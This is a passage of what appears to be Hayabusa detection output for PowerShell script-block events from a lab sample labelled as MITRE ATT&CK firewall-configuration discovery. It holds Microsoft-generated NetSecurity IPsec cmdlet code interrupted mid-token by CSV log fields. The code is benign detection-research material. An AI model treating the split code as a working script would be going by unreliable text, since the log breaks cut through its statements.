[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,eterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 